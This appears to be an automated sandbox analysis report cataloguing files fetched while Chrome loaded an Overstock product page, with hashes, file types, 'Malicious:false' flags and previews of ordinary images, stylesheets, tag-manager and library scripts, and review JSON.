                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 56x56, segment length 16, progressive, precision 8, 1610x894, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):280258
                                                                                                                                                                                    Entropy (8bit):7.990328273071587
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:5oKaqFgMDItsTmsaH3tXgDwYHP1ZxTfrfSjs8D7X6L/s2prYeZ:PWpMI3tQDhPPpbs/w/tpUc
                                                                                                                                                                                    MD5:65794BBCDDCCA20BAF8F36DAB2AF0B06
                                                                                                                                                                                    SHA1:7C95730D9E1CEC95C6EED6DBC4B44092EC592D63
                                                                                                                                                                                    SHA-256:F1E1E8C16F390A775673915F7121D8E45FDBB34D7437C6FEBAC0C47EE61F4E66
                                                                                                                                                                                    SHA-512:079C4DD9DF360529BCFDE98CE99BE9049F6447BA8A4671C6E648B388E04EE69CB95E77BFE212D36A07C76282BCB3973927555F1DA5CDEE38D56176DFE9343CAE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF.....8.8............................................!...!.1&""&18/-/8D==DVQVpp.......................................!...!.1&""&18/-/8D==DVQVpp.......~.J.."..........5....................................................................O...|......=......=.y.._.I...|........w...>..."...%.t.f..g}....:k....o.zd.[.3....s.U:p.e.KO...n..,...7-::{..F;../.........6dMk..k..<..".4.\..[..:..t..8t...tK..@...B..]..Pot^..z\}......s..46.+..q....a4C.w<....v6.Gg......|/....}.....Ij.....N..:uQs.s....N..y.i./%..}\....~...%.......^=.!....J...;.......\.zn.....>.............WF.M...H#.v..L........P...b.xV.......Op...~X...S...d..;.3.......w..Mg..$.$.,.k.`.........r.0......`-.=.i..D..h...c..P.@....LI.b....&$E4.....$PM3...X.x..W.......B.BI.)..3...................z.O..$.&..L1.@..@.....=T..h.....9@.@m ..4(.....+.F.w0.k#c...v.7.....^...jVjC........q.\Fl.o..G.....2..>...V....../...8...~g...s...gx.g5M?...V.....obh.}...z'P._.?...v[]..r.?C..9.x..sv.M.>}..z
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (6675)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):6676
                                                                                                                                                                                    Entropy (8bit):5.320501745843864
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:HlDZ3G1K6RVDLqdhIyMIeMUI46IKnfNerCiEn+bis4eUFLRHM9RWXJdBsh:HBtwKgLqd7tECiE+2s4eyLRHMzA+
                                                                                                                                                                                    MD5:37A8D12CC81772CCF9B0ED3405D71BD3
                                                                                                                                                                                    SHA1:90585CDC6EF0526B17E379126672A06F99FE1935
                                                                                                                                                                                    SHA-256:B4A875465F0884F67794DAD84FF57019B8D2425FB9454FA0FB2007DE412B36FF
                                                                                                                                                                                    SHA-512:156D44C417E558E2CC176A8398717D6E210B2AECDC6D1A37AF4EE853D334DD1A471F51CAABDE436C06288DA0FF69C558BD9F045BC48D306BE71454200D205B14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/VaultedPayment.BO3829nT.css
                                                                                                                                                                                    Preview:.agRve{padding:var(--x-spacing-large-400) var(--x-spacing-large-500);border:1px var(--x-default-color-border) solid;border-radius:var(--x-global-border-radius, var(--x-border-radius-base))}.FiV0Z{width:10.857142857142858em;height:5.714285714285714em;fill:none;stroke:var(--x-default-color-border)}.mpn0m{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.KOEBK{width:3.8rem;height:2.4rem;border:1px solid rgba(0,0,0,.07);border-radius:3px;background-color:var(--x-default-color-accent-contrast)}.o0Dix{cursor:default;margin-top:-.07142857142857142em;margin-bottom:-.07142857142857142em}.fmZaX{height:2.4rem;display:flex}.e3sCv{padding:var(--x-spacing-large-300);text-align:center}.hevoz{width:4.642857142857143em;fill:var(--x-default-color-border);display:block;margin:auto;margin-bottom:var(--x-spacing-large-100)}[dir=ltr] .NM5yz{left:0}[dir=rtl] .NM5yz{right:0}.NM5yz{background-color:var(--x-default-color-background-subdued);top:0;position:absolute;z-index:1;he
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2527
                                                                                                                                                                                    Entropy (8bit):7.1144165805144395
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVx+WW3q8yad7CILb5aBO6kuQzxGRlVPf:NBIl/XrxjaTLb5aY/NzkRrPf
                                                                                                                                                                                    MD5:7D625E1FB4C0E126E306B81550AB432E
                                                                                                                                                                                    SHA1:1D3CADF1194FB44098BF2D4DAC894ED7CFE3DF37
                                                                                                                                                                                    SHA-256:54840208E48305C85363913CAC92FA80F2BAFC0A2ADE5E36D958C0833DDBE55E
                                                                                                                                                                                    SHA-512:16D7E17F5BB4864EEBD432A7A4852CDE00B81572633306FAA9D67C65EC42D3F06B73D79E596C33F51479457A65BA1D47211872AE81FBCD84518E5781C3EE76EA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................Jr..D......4-...}8(0.cD..m. ...z.....2i..O..O..^.n.(#0...)Y"dX.f.<F..]..I.4..s..^.9..L0...YZvx>N.6I...G._F;aE..e....o...5....,1.H...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32757)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):387524
                                                                                                                                                                                    Entropy (8bit):5.570773100538782
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:Y+NuMYbBzAGWJ2SG3gPDoFM/GUTx0C8Gp/M4N:Yw2/UDoFqaA
                                                                                                                                                                                    MD5:221A549F6CD423E30EC19EF4301460CA
                                                                                                                                                                                    SHA1:49B1E7D630D4A247E3B0749A4A59695829FCBF18
                                                                                                                                                                                    SHA-256:D8079BE94DEC09273508FFC6FED0E0A4486930D0BBFD7C58BDF4BD7DD8203A95
                                                                                                                                                                                    SHA-512:D7BFFBD55E35574CC8715BDF9D312A0449ED3EC6769F7C3FE1615BDAAF5ECA673B961C5EFE56158DA9B4FCF06B2B61205968D82CF74D57DD31B5BAA09C12752C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"552",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.country"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.city"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.address1"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"lastName"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"phone"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.state"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1610
                                                                                                                                                                                    Entropy (8bit):4.511513249076438
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:t3JfDutxQlA7k6/+ggshwmTcaQlA7k6/+ggshwmTcgf0Y1laepgCEzdkSzcHb:3XlArHgxtlArHgxgMKlaetsY
                                                                                                                                                                                    MD5:FBDE3F8CEEC0EA77C591897D9E3B75CE
                                                                                                                                                                                    SHA1:A3F68851F05B290E6783D27FA226B85EB5FE9DD3
                                                                                                                                                                                    SHA-256:CA55C33D7A9415A6FDAB6C0D883F5B7A16A82A33F987C6C09675F685125917F9
                                                                                                                                                                                    SHA-512:AA38884D40DB633397A53DD91895F2DBB4ACD85C3A6053E292541D51642C83C4258FC4ACC06ECBE2B03A09A3047C2950EC28E8B9083E4BEE7174D53435ACE215
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_393_915)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<p
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (27068)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):46520
                                                                                                                                                                                    Entropy (8bit):5.342606603321526
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:dgLivxJv6rqgLInXZZZx6+VWjq0Lui7A9GRUkrpBRAuME+nIFB61dZebJrIWDpNM:WLivLv6rLLInXZZZx6+VWu0LuisYTpbU
                                                                                                                                                                                    MD5:279F66B5BC2167F4D93BD0ECF1A8E894
                                                                                                                                                                                    SHA1:0CB86EBD91440FA12CE53EBF14566AF5390CB0BB
                                                                                                                                                                                    SHA-256:A0E952ABDDCB7C81AE6F848B6216A10757D84DAD5832B7362FA08DCD4644C9F6
                                                                                                                                                                                    SHA-512:BAB0920CAB0D478A3376F3F965C89C8A650E950083FFA7ADF8BAEE1D36BD0D0ADF43DABF4785E9D96E66587BBAAECE4713202FF3AE1D5D8A08568E0925FC6CC0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var Sizzle=(function(e){var t,n,r,i,o,u,l,a,c,s,f,d,p,h,g,m,y,w,v,b="sizzle"+1*new Date,N=e.document,x=0,C=0,E=oe(),D=oe(),A=oe(),T=function(e,t){return e===t&&(f=!0),0},S={}.hasOwnProperty,L=[],I=L.pop,q=L.push,B=L.push,R=L.slice,$=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},k="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",H="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",M="\\["+P+"*("+H+")(?:"+P+"*([*^$|!~]?=)"+P+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+H+"))|)"+P+"*\\]",F=":("+H+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+M+")*)|.*)\\)|)",O=new RegExp(P+"+","g"),j=new RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),z=new RegExp("^"+P+"*,"+P+"*"),G=new RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),U=new RegExp("="+P+"*([^\\]'\"]*?)"+P+"*\\]","g"),V=new RegExp(F),X=new RegExp("^"+H+"$"),J={ID:new
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1610x894, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):201308
                                                                                                                                                                                    Entropy (8bit):7.999142152425323
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:3072:9Z4xio8xecB3v1GTvMspeo282XK6k7TKlv/ewIx5K+vMCgwUojWNsjJkXwdK5fay:9Od8xeczGTvMQVvR2L/Ns9kyK5nd
                                                                                                                                                                                    MD5:7F5EDC111F84FBA091DAD7E84A3A2EE8
                                                                                                                                                                                    SHA1:F93AFD1B1176401B2F89F12561A5A17A39777114
                                                                                                                                                                                    SHA-256:9A283AB89ABDEE65AF4518C41653F8C8606FC256AD1F4CEB9248CCB8EF32A18C
                                                                                                                                                                                    SHA-512:0D12BB7DDEA13E67759CD8B6F814B4A662B38D013C1F7478B006FF2C2F6E1E31A833867B476D382AAA4852FE17E27F922BE72CDF05B49E45E58C3A4A93E6ED87
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10282024-MOPS-COOP-A3-DSK_.jpg
                                                                                                                                                                                    Preview:RIFFT...WEBPVP8 H...0....*J.~.>.J.J'$)...L...cm..i.L>....D.......?..nz?......w.....?}.......c.......y2.o._......@.4........{......b...lLh....e.<.s.......BjM...?.O>...Y.x..o/..&...cB...-..?M.X.....;..........U............o..-.....}........_..)........k....._........).........?.....Y./..]............^........7..a?(......=.~........?(......[.f.e#...\*.. S......7.......8._...J.*..xg.O..H....im..........C.s!.vxG"Q..E.*Po.D...qs./4.T{.*E..?.x.*)f.W....y[Fd..p..3.o.d].Q.O.#So=q......|j..fL&z...*u.k.s#......l.k..b........,..2rN.R..I..g.....U.K...&..+..9.>.&..%.]........Q.."?..D......zeB..u../..<...>.-...q.O.?....L..../.t>2oU...ua.+*fUv8.j...S...........:3&.0<.T.....j...'..Dd!...m%.G...?.~.9.d...~..+.zB.w7..Z,..a....p.....Xx.E......S...ZJ.y..7.$..b...iy..j4....w?n..7...T..]-..c.....{M?|...aN..CD:{...>..].....P....w.......j.'.qc..`.\.F.....=w..G..e..O(#..MDd.,.n.y..^.j...8...0...yqJ.....n..g{.7.~..l...n`F..4.w}.s6........^....vU.C.^....d....o;..C.%..?0\,>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65321)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):96614
                                                                                                                                                                                    Entropy (8bit):4.750153610655337
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
                                                                                                                                                                                    MD5:4CA760F49CD8A14911C81E6C14328874
                                                                                                                                                                                    SHA1:81687E7A5DBBA470120798CF05DC31E8D57F0B11
                                                                                                                                                                                    SHA-256:F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
                                                                                                                                                                                    SHA-512:BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.750246367122672
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfa5GLDWLNBExGVLKwxGVLNXQ4LrPyLduLGGWLmyLcmLV:YBVLyL7uGVLLGVLNXVLrKLALGpLNLTLV
                                                                                                                                                                                    MD5:CE57B832C8A771AE3781870F6463EE0E
                                                                                                                                                                                    SHA1:3F46D5988990110101CBF3234C6330EFF2570EE4
                                                                                                                                                                                    SHA-256:1EE98CE00111C8B8C04B57045952617EAE1B39E072D0FF39D54447828B4641E5
                                                                                                                                                                                    SHA-512:13979E0684587D797F4C3DDBB78A4B473ED6EB16C8BDF885FE19DCD59BD049E63EAC734972AF6D65B1B43BCB984D0D0FBA94DAC8AC9EF9601F49C64D85C96AE4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"35696626","rollup":{"average_rating":4.44,"rating_count":73,"review_count":73,"answered_questions":0}},{"page_id":"38101309","rollup":{"average_rating":4.55,"rating_count":11,"review_count":11,"answered_questions":0}},{"page_id":"37831689","rollup":{"average_rating":5.0,"rating_count":8,"review_count":8,"answered_questions":0}},{"page_id":"39176653","rollup":{"average_rating":4.63,"rating_count":8,"review_count":8,"answered_questions":0}},{"page_id":"9463624","rollup":{"average_rating":4.75,"rating_count":177,"review_count":177,"answered_questions":0}},{"page_id":"13404429","rollup":{"average_rating":4.28,"rating_count":161,"review_count":161,"answered_questions":0}},{"page_id":"20457171","rollup":{"average_rating":4.71,"rating_count":699,"review_count":699,"answered_questions":0}},{"page_id":"28272004","rollup":{"average_rating":4.82,"rating_count":11,"review_count":11,"answered_questions":0}},{"page_id":"31629369","rollup":{"average_rating":4.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):62111
                                                                                                                                                                                    Entropy (8bit):5.51116653266677
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLI2:qYW2Pj5yO7t2ACRg839837
                                                                                                                                                                                    MD5:0128753413D320761896E9FD66AFC6AE
                                                                                                                                                                                    SHA1:490DA439D2EEA205FEC9243043B293DDDA578181
                                                                                                                                                                                    SHA-256:76E622E3B35FC271F4089FFD2644F5D72D2576F612F334860148CDD7F5A3637A
                                                                                                                                                                                    SHA-512:C5FB8963D57B0FC5371C9ACEE6705A0E6AA99E6BB54C7DF0C347C44E504FCFAAF3AAA408E058698A21C7AEAB9FB040AB6EC64F954C42E6C2B4DBD3F2954BDE3B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2428
                                                                                                                                                                                    Entropy (8bit):7.325030238737205
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:DIl/XflxXUyPpAJ4WgKyzKQUKwMqjjoHU8nMD:DIl/XXkydULKwlcHTMD
                                                                                                                                                                                    MD5:6E7A07D6D72AC1B5F8DFBFCA1B63082C
                                                                                                                                                                                    SHA1:D8C721A041E3CE2CC0C527D1899CD66F10D52DE5
                                                                                                                                                                                    SHA-256:CADED142B276979DCC88591BCDBBE389FE985743D9976101E2695BDE92B1EABF
                                                                                                                                                                                    SHA-512:A4ABD7A3D62EC5C82181ED8BDCBDBCF45D4E9485106496BDC838C4D2CD31E0AF0AB1E680EE1FB0CC9B7C193244E654E76B5F2F20A1233B11D8BD36F0A92CE834
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_bb8c759b-2654-4cf5-bc06-d4c1e14e6c2b.jpg?v=1729322979&width=80
                                                                                                                                                                                    Preview:RIFFt...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>-..B.......bY.0..:f...c.K....KL....k...'E|1._..n._..h.ak..."....~.J........k....$.n.k.RO.....U..n...2...f........I.N.a5r.............FRi..J]._.....N.h...].n.S.*.....$R...k......f`@y..X...4...v.4...[..t.[.&D.X...........N.?..S.]'7`....9..e...%.{.0.!y...~j....T<..z2q.`..Z.~...H....].P.5.S..-.F.iM\..v.T. ....g.7|...o.?wB..,k;..p...!......W......D...:Q4...ht..-.A..R.].gRi..Z.c1y:....X...ee.y..I.....[!....l..H....r....v$.h.D.!.y..c.Lm)....................J....v..CH.I..+.t'N*.../q.V...}+....b
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):45336
                                                                                                                                                                                    Entropy (8bit):7.986603344058803
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:ARZyKTV9zi2ugI4qM/KYzmadsIE3pHUaiWpyC5tyjB0:AR8y22ugImKYzmaq5HU/WkC5tye
                                                                                                                                                                                    MD5:98B8E31F93D85B04C179D7A091A8FF83
                                                                                                                                                                                    SHA1:EB03A2F4C4BE69FCD485191BE718F7BB33A4D6AF
                                                                                                                                                                                    SHA-256:461C28CC26B7A31909418402F8333D5132634793ECC8B7A60F9ABE4D77DC4E7B
                                                                                                                                                                                    SHA-512:A72DD0A18591762FA7615849E0BD138EAE62A8393919E56DEC7B638026BA3ECD7C9B10B5290181ADF16AE330A738E5BAC0C21D75C0B5531D63C6F93D53B8146B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-800X800_A1_Middle.jpg?v=1729531877&width=650
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p....*....>E..D.....-.(.D.7g.-.^5........j$(...Ty.>d^bY.o.n.Q>.._..........9.......G.{..O.D.p........|o...m?....'.g.......................}.{.~......k........0...s...c.._......w...m.M......O......x.e.......o...9......}......._..................W...?..................?@...@?.........._.....z..o.....~..t...e.....................~..r..........=...k.....?..l............O.......K.........~.>....I.........^G.y.............q~R.......K...?......_.)..././............G.........?.......TK/...l.z]M..w..j["...HX....m
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2497)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2599
                                                                                                                                                                                    Entropy (8bit):5.030374086058804
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:1ZYRng2lJE0VEr5DLA/usyYF2TMXUbpMUXySeLoxNYA8:1qn7Er5DMlyYAdqA78
                                                                                                                                                                                    MD5:504EB1F52B195F31EAFC53C1CCFE0CB4
                                                                                                                                                                                    SHA1:CF7908827AFB0552B08DDD23C05709BCAE30844D
                                                                                                                                                                                    SHA-256:CDA2132CFAFC64B4D5C07C6E023E6801EA6DAD13D2EE15EBC98A86B2B8769C42
                                                                                                                                                                                    SHA-512:A672746B18D45781FC446199F7267ECC9132440F28265E663573ADA41839937F91091FC09F4712C67199D39F057B3F8A93300E7C7540C266DF88FDF3D7363EC4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/content-cards.css?v=65834774719010717701730157903
                                                                                                                                                                                    Preview:.content-cards-container{position:fixed;height:100vh;right:0;top:0;width:440px;max-width:100%;background-color:#fff;z-index:100;box-shadow:0 0 4px #00000029;transform:translate(100%);transition:.2s ease-in-out}.content-cards-container.show{transform:translate(0)}.drawer-open:after{content:"";background:#0003;position:fixed;width:100%;height:100%;z-index:55;top:0;left:0}.content-cards-header{display:flex;padding:10px 18px;box-shadow:0 1px 4px #00000029;justify-content:space-between;align-items:center}.cch--title{font-weight:700;font-size:18px;font-family:var(--font-body-family);color:#5a5a5a;justify-content:space-between}.cch-btn{background:transparent;border-radius:2px;border:1px solid #DBDCDF;height:100%;padding:8px;cursor:pointer}.head-slot-bell{cursor:pointer;position:relative}span#badge{position:absolute;top:9px;right:5px;background:#fff;width:22px;height:22px;padding:0 5px;display:flex;justify-content:center;align-items:center;transform:translate(25%,-40%);border-radius:50%;font-s
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):25135
                                                                                                                                                                                    Entropy (8bit):4.706047497502984
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:0CTY9KkSfg1PjXo8thNlafuY2IojXzQ1UUzAQ1UUzsx7W:M2fgSSmMC
